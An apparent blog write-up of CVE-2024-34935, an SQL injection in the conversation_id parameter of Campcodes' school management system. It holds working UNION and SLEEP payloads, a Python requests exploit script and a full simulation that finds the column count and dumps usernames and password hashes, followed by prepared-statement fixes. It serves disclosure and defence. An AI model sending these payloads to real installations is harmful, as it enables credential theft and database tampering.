A recent vulnerability has been identified in the Campcodes Complete Web-Based School Management System 1. that could allow a remote attacker to read, modify or delete data in the system's backend database. Tracked as CVE-2024-34935, the issue affects the conversation_id parameter of the /view/conversation_history_admin.php endpoint and is a classic, critical SQL Injection.
In this post, we’ll break down what this vulnerability means, how it can be exploited, and give you all the essential technical details with code snippets, so you’ll know how to check for it or defend against it.
What is SQL Injection?
SQL Injection is one of the most dangerous vulnerabilities in web applications. It happens when user-supplied data is placed into a database query as part of the SQL text instead of being passed as a bound value. An attacker can then change the meaning of the query to read, modify or delete data they should not have access to, and in some database configurations read files or run commands on the database host.
- Product: Campcodes Complete Web-Based School Management System
- Version: 1.
- CVE: CVE-2024-34935
- Affected Script: /view/conversation_history_admin.php
- Vulnerable Parameter: conversation_id
How The Vulnerability Occurs
The conversation_id value is read straight from the GET request and concatenated into an SQL statement with no validation and no parameterization, so whatever the client sends becomes part of the query text.
Example of (likely) vulnerable PHP code
```php
<?php
// conversation_history_admin.php
// Pseudocode reconstructed from the typical vulnerable pattern, not the vendor's exact source;
// the connection details are placeholders
$conn = mysqli_connect('localhost', 'dbuser', 'dbpass', 'school');
$conversation_id = $_GET['conversation_id'];   // untrusted input, used as-is

// Vulnerable query: the raw value is interpolated straight into the SQL text
$result = mysqli_query($conn, "SELECT * FROM conversation WHERE conversation_id = $conversation_id");
```
Here, if an attacker sends a crafted value for conversation_id, it will be executed as part of the SQL query.
Exploitation Example
Let’s say an attacker wants to dump every username and password from a users table. The table name and the five-column layout of the conversation table are assumptions for this example; in a real test the column count of the original SELECT has to be found first (for example by increasing ORDER BY n until the database returns an error), because a UNION only works when both sides return the same number of columns. They can craft the following request:
GET /view/conversation_history_admin.php?conversation_id=1%20UNION%20SELECT%201,username,password,4,5%20FROM%20users--+
URL-decoded, the parameter value is:
1 UNION SELECT 1,username,password,4,5 FROM users-- 
The trailing + decodes to a space, which MySQL requires after -- for the rest of the line to be treated as a comment.
- The SQL query becomes
SELECT * FROM conversation WHERE conversation_id = 1 UNION SELECT 1,username,password,4,5 FROM users-- 
The row for conversation 1 is returned together with one injected row per user, and anything the application appends after the parameter is commented out.
Find the vulnerable parameter:
- Intercept a normal request to /view/conversation_history_admin.php?conversation_id=1 and note the response.
- Confirm that the parameter reaches the database with a time-based probe; a response delayed by about five seconds means the expression was evaluated by MySQL:
/view/conversation_history_admin.php?conversation_id=1 AND SLEEP(5)
- Extract data with a UNION query once the column count of the original SELECT is known (the five columns and the users table below are assumptions):
/view/conversation_history_admin.php?conversation_id=1 UNION SELECT 1,username,password,4,5 FROM users--+
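The three steps above, run end to end against a small stand-in for the vulnerable endpoint. This is an added example, not code from the post or from Campcodes: an in-memory SQLite database replaces the MySQL backend, the table and column names follow the post's payload, the five-column layout of `conversation` and the sample rows are constructed, and the helper names (`vulnerable_lookup`, `safe_lookup`, `confirm_injectable`, `find_column_count`, `dump_users`) are my own. SQLite has no `SLEEP()`, so the confirmation step uses the boolean twin of the time-based probe (`AND 1=1` versus `AND 1=2`). The hardened lookup at the end shows why the fix discussed later works: the same payload is rejected as a non-integer and would be bound as data even if it got through.

```python
import sqlite3

# Constructed sample data standing in for the school system's database (assumption).
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE conversation (
            conversation_id INTEGER, sender TEXT, receiver TEXT, message TEXT, sent_at TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO conversation VALUES (1, 'admin', 'teacher1', 'Meeting at 9', '2024-05-20');
        INSERT INTO conversation VALUES (2, 'teacher1', 'admin', 'Noted', '2024-05-20');
        INSERT INTO users VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO users VALUES ('teacher1', 'e10adc3949ba59abbe56e057f20f883e');
    """)
    return db


def vulnerable_lookup(db, conversation_id):
    """Same pattern as the vulnerable PHP: the raw value is spliced into the SQL text."""
    sql = f"SELECT * FROM conversation WHERE conversation_id = {conversation_id}"
    return db.execute(sql).fetchall()


def safe_lookup(db, raw_value):
    """Hardened form: reject non-integers (like FILTER_VALIDATE_INT), then bind as a parameter."""
    try:
        cid = int(raw_value)
    except (TypeError, ValueError):
        return None  # the web layer should answer HTTP 400 here
    return db.execute(
        "SELECT * FROM conversation WHERE conversation_id = ?", (cid,)
    ).fetchall()


def confirm_injectable(lookup):
    """Boolean twin of the post's `1 AND SLEEP(5)` probe: an injectable parameter returns
    the row for a true condition and nothing for a false one."""
    true_rows = lookup("1 AND 1=1-- ") or []
    false_rows = lookup("1 AND 1=2-- ") or []
    return len(true_rows) > 0 and len(false_rows) == 0


def find_column_count(lookup, max_cols=20):
    """Probe ORDER BY n upward; the first n the database rejects is one past the column count."""
    for n in range(1, max_cols + 1):
        try:
            lookup(f"1 ORDER BY {n}-- ")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("column count exceeds max_cols")


def dump_users(lookup, ncols):
    """The post's UNION payload padded to the discovered column count. -1 instead of 1 makes
    the WHERE clause match nothing, so only the injected user rows come back."""
    pad = "".join(f",{i}" for i in range(4, ncols + 1))
    rows = lookup(f"-1 UNION SELECT 1,username,password{pad} FROM users-- ")
    return sorted((row[1], row[2]) for row in rows)


if __name__ == "__main__":
    db = build_db()
    vuln = lambda payload: vulnerable_lookup(db, payload)
    print("injectable:", confirm_injectable(vuln))
    ncols = find_column_count(vuln)
    print("columns:", ncols)
    print("dumped:", dump_users(vuln, ncols))
    print("hardened lookup with payload:",
          safe_lookup(db, "1 UNION SELECT 1,username,password,4,5 FROM users-- "))
```

The `lookup` callable is the only thing that differs between the vulnerable and the hardened run, which is the point: the probing logic is generic, and the fix lives entirely in how the parameter is handled before it reaches the database.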
Here's a simple Python request to demonstrate the exploit. Note that the payload ends in "-- " (with a space), not "--+": requests URL-encodes the space as the + seen in the URL above, whereas a literal + would be sent as %2B and MySQL would not treat "--+" as a comment.
```python
import requests

# Target host, table name and column count are this post's assumptions; adjust to the tested instance
url = 'http://target-site/view/conversation_history_admin.php'
payload = "1 UNION SELECT 1,username,password,4,5 FROM users-- "
params = {'conversation_id': payload}

# requests encodes the trailing space as '+', producing the --+ form shown in the URL above
response = requests.get(url, params=params, timeout=10)
response.raise_for_status()
print(response.text)
```
References
- Campcodes original source page
- NVD CVE-2024-34935 (official record, check for updates)
- OWASP SQL Injection
How to Defend Against It
- Input validation: conversation_id is a numeric identifier, so reject anything that is not an integer before it is used at all (for example with filter_input and FILTER_VALIDATE_INT). Validation is defense in depth, not a replacement for the next point.
- Use prepared statements: parameterize every SQL query with PDO or mysqli prepared statements so the value is bound as data and never parsed as SQL.
Example of Safe PHP Code
```php
<?php
$conversation_id = filter_input(INPUT_GET, 'conversation_id', FILTER_VALIDATE_INT);
if ($conversation_id === false || $conversation_id === null) { http_response_code(400); exit; }
$stmt = $conn->prepare('SELECT * FROM conversation WHERE conversation_id = ?'); // $conn: existing mysqli connection
$stmt->bind_param('i', $conversation_id); // bound as an integer, never interpolated into the SQL text
$stmt->execute();
$result = $stmt->get_result();
```
Conclusion
CVE-2024-34935 is a high-impact SQL Injection bug in a popular open-source school management system. Anyone using Campcodes’ School Management System 1. should patch or secure their installation immediately.
If you run this software:
Update or patch your code to use prepared statements.
If you’re a researcher or sysadmin:
Stay safe and keep your apps secure!
Timeline
Published on: 05/23/2024 17:15:30 UTC
Last modified on: 08/01/2024 13:52:27 UTC